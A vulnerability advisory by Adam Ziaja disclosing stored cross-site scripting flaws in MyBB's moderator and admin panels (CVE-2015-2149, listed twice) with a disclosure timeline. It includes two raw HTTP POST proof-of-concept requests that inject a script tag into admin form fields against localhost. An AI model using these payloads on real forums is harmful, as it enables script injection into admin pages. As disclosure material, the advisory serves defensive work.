Multiple stored cross-site scripting (XSS) vulnerabilities in MyBB (CVE-2015-2149, CVE-2015-2149)

Multiple stored cross-site scripting (XSS) vulnerabilities in MyBB:

CVE-2015-2149 — Cross-site scripting (XSS) vulnerability in Mod CP and Admin CP in MyBB 1.8.3 and earlier allows remote attackers to inject arbitrary web script or HTML.

Proof of Concept:

POST /mybb/admin/index.php?module=user-groups&action=edit&gid=4 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://localhost/mybb/admin/index.php?module=user-groups&action=edit&gid=4
Cookie: mybbuser=1_hPwCJylOqlpxxvUTgZkngdjPxoloR74ek1gsOhpxL6lO8ZTtKC; sid=6af4e8e55ca66d31fd946e3368893516; acploginattempts=0; adminsid=d28125ba4e1e7de2fb5e3bb8085a4baf; inlinemod_useracp=%7C2%7C
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 1418

my_post_key=9b2e4af17311948ce86eb067a14570c7&title=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&description=The+group+all+administrators+belong+to.&namestyle=%3Cspan+style%3D%22color%3A+green%3B%22%3E%3Cstrong%3E%3Cem%3E%7Busername%7D%3C%2Fem%3E%3C%2Fstrong%3E%3C%2Fspan%3E&usertitle=&stars=7&starimage=images%2Fstar.png&image=&showmemberlist=1&showforumteam=1&issupermod=1&canmodcp=1&cancp=1&canview=1&canviewthreads=1&cansearch=1&canviewprofiles=1&candlattachments=1&canviewboardclosed=1&canpostthreads=1&canpostreplys=1&canratethreads=1&maxposts=0&canpostpolls=1&canvotepolls=1&canundovotes=1&canpostattachments=1&attachquota=0&caneditposts=1&candeleteposts=1&candeletethreads=1&caneditattachments=1&edittimelimit=0&canusercp=1&canchangename=1&cancustomtitle=1&canuploadavatars=1&canusesig=1&canchangewebsite=1&canusesigxposts=0&usereputationsystem=1&cangivereputations=1&reputationpower=2&maxreputationsperthread=0&maxreputationsday=0&canwarnusers=1&canreceivewarnings=1&maxwarningsday=0&canusepms=1&cansendpms=1&cantrackpms=1&candenypmreceipts=1&pmquota=0&maxpmrecipients=0&canviewcalendar=1&canaddevents=1&canbypasseventmod=1&canmoderateevents=1&canviewonline=1&canviewwolinvis=1&canviewonlineips=1&canviewmemberlist=1&showinbirthdaylist=1&cansendemail=1&maxemails=0&emailfloodtime=0&canmanageannounce=1&canmanagemodqueue=1&canmanagereportedcontent=1&canviewmodlogs=1&caneditprofiles=1&canbanusers=1&canviewwarnlogs=1&canuseipsearch=1

and XSS work on i.a.:
• http://localhost/mybb/admin/index.php?module=user-groups
• http://localhost/mybb/admin/index.php?module=user-users&action=edit&uid=1
• http://localhost/mybb/admin/index.php?module=user-users&action=add
• http://localhost/mybb/modcp.php?action=finduser
(in "description" is also XSS, but work on fewer pages)

CVE-2015-2149 — Cross-site scripting (XSS) vulnerability in Mod CP and Admin CP in MyBB 1.6.12 and earlier allows remote attackers to inject arbitrary web script or HTML.

Proof of Concept:

POST http://localhost/mybb/admin/index.php?module=config-profile_fields&action=edit HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
Content-Length: 295
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Origin: http://localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/29.0.1547.65 Chrome/29.0.1547.65 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost/mybb/admin/index.php?module=config-profile_fields&action=edit&fid=3
Accept-Encoding: sdch
Accept-Language: pl-PL,pl;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: mybb[lastvisit]=1387132366; mybb[lastactive]=1387132375; loginattempts=1; mybbuser=1_BTLKMVfnKgP1UR6SdXt1DuMh6Toqd9GStuFY1BQOUp6dltdm3c; adminsid=210f3de946b87be401e5780f6a2323d7; acploginattempts=0

my_post_key=1c35bada79db89f75d0cdf16c587dae7&fid=3&name=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&description=Please+select+your+sex+from+the+list+below.&fieldtype=select&maxlength=0&length=0&options=Undisclosed%0D%0AMale%0D%0AFemale%0D%0AOther&disporder=0&required=0&editable=1&hidden=0&postnum=0

and XSS work on i.a.:
• http://localhost/mybb/admin/index.php?module=user-users&action=edit&uid=1
• http://localhost/mybb/modcp.php?action=editprofile&uid=1

Timeline:
2013-12-15 — reported on mybb.com e-mail, no answer
2013-12-28 — reported on mybb.com (responsible disclosure)
2014-04-26 — "silent" fix "POST admin/index.php?module=config-profile_fields&action=edit" XSS ("POST admin/index.php?module=user-groups&action=edit&gid=4" still work!) in security release MyBB 1.6.13 — lack of information in the changelog etc about XSS vulnerability in Mod CP and Admin CP
2015-01-16 — XSS still work (reported in MyBB 1.6.12 — 13 months earlier) in the latest version MyBB 1.8.3, disclosed on twitter
2015-02-15 — fixed in MyBB 1.8.4

Adam Ziaja <adam@adamziaja.com>